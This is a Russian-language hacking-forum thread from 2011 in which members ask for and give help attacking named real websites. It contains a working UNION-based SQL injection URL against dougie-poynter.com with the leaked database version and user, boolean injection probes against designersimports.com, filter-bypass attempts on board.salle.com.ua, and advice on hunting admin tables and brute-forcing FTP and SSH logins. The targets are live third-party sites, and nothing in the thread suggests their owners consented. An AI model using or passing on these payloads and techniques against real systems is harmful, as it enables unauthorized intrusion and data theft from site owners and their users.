Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Кинь ссылку сюда или в личку, попробую раскрутить
     
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Если отсутствуют, то возможно:
    1) В другой БД
    2) доступ в админку по данным из файла
    3) Таблица названа не "admin" а к примеру "images_222". Ищи таблицы с условием что в ней есть колонки LIKE '%pass%' и т.д.

    Если пасы не подходят:
    1) Искать другую админку
    2) Просканировать сабдомены
    3) Пробрутить FTP \ SSH с использованием хакерской догадки. (Хакерская догадка нужна для подбора логина. Примеры: то что вытащил из скули, root, www, user() которого вытащил скули, site.ru, site, siteru, ftp, etc.....)
     
    #16722 Tigger, 13 May 2011
    Last edited: 13 May 2011
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    помогите разобраться:
    как я понимаю это блинд, но она по идее выводит результаты в отчетах об ошибке, как ту можно еще вывод посмотреть?
     
    _________________________
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    С чего ты взял?
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    потому что запросы ввиде:
    +union+select+1,2,3,4,5,6,7,8,9--
    +/!union+select+1,2,3,4,5,6,7,8,9--
    не проходят, а group+by+ говорит что их 9, а приведеный выше запрос проходит, но введу того что отчет об ошибках там отключен, мы не можем его увидеть, вот и интиресует, что в такой ситуации еще можно придумать...
     
    _________________________
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Сравни запросы:
    Code:
    http://board.salle.com.ua/index.php?catid=25+order+by+9--+
    Code:
    http://board.salle.com.ua/index.php?catid=25+pohui+chto+pisat+9--+
    Результат одинаковый ;)
     
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Там нет скули. Все символы, кроме цифр пропускаются, поэтому приведенные выше запросы эквивалентны запросу
    Code:
    http://board.salle.com.ua/index.php?catid=259
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    а если так:
    :D
     
    _________________________
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Думаю, что это Oracle.
     
    1 person likes this.
  10. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Да хоть так:
    Code:
    http://board.salle.com.ua/index.php?catid=2a--_asdqwe@fdMk,.asdl;|+5+$Kfd9
     
    1 person likes this.
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    ммм, вообще то там скорее есть уязвимость, т.к.
    Code:
    http://board.salle.com.ua/index.php?catid=25 // возвращает "Объявления раздела Продукты"
    http://board.salle.com.ua/index.php?catid=0+or+25 // возвращает "Объявления раздела Продукты"
    http://board.salle.com.ua/index.php?catid=0+or+24 // возвращает "Объявления раздела Оборудование"
    
    из чего делаем вывод, что там просто фильтр-блэклист "вредных" символов и слов, обойти который я пока не смог

    Да и запрос там такой:
    Code:
    select cat_name from board_category where cat_id = ДАННЫЕ
    Исходя из этого:
    Code:
    http://board.salle.com.ua/index.php?catid[]=
     
    _________________________
    #16731 Expl0ited, 13 May 2011
    Last edited: 13 May 2011
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Я же написал - фильтруется все, кроме цифр.
    0+or+25 вернет то же самое, что и 25, 025 или к примеру 0№*)_(hfb2JMU5
     
    1 person likes this.
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Согласен, там скорее всего preg_match, т.к. он убирает из запроса всё кроме букв, т.е. при запросе
    Code:
    http://board.salle.com.ua/index.php?catid=25+order+by+10
    он ничего не возвращает, а при запросе
    Code:
    http://board.salle.com.ua/index.php?catid=25+order+by+9
    он возвращает 259 страницу:
    Code:
    http://board.salle.com.ua/index.php?catid=259
     
    _________________________
  14. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    HEEEEEEEEEELP!!
    Есть oracle 10g sql injection вида:
    Можно ли как нибудь изменить значение в базе данных?
    Например пробую так:
    Выдает ошибку:
    Помогите плз!
     
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите раскрутить, не знаю, как подступиться!

    http://www.dougie-poynter.com/discography/release.php?id=23'
     
  16. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Запрос:
    Code:
    http://www.dougie-poynter.com/discography/release.php?id=-1/**/union/**//*!select*//**/1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15
    Результат:
    Code:
    5.0.92-community:dougie_user@localhost:dougie_
     
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    LiRvD082, кинь ссылку в ЛС
     
  18. guezd

    guezd Elder - Старейшина

    Joined:
    31 Mar 2011
    Messages:
    250
    Likes Received:
    133
    Reputations:
    81
    что может означать символ "~" в конце расширения файла на фряхе ?
     
  19. AleksNEW

    AleksNEW New Member

    Joined:
    5 Aug 2010
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    _____________________
     
    #16739 AleksNEW, 14 May 2011
    Last edited: 4 Mar 2012
  20. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Нет.

    http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=true

    http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=false
     
Thread Status:
Not open for further replies.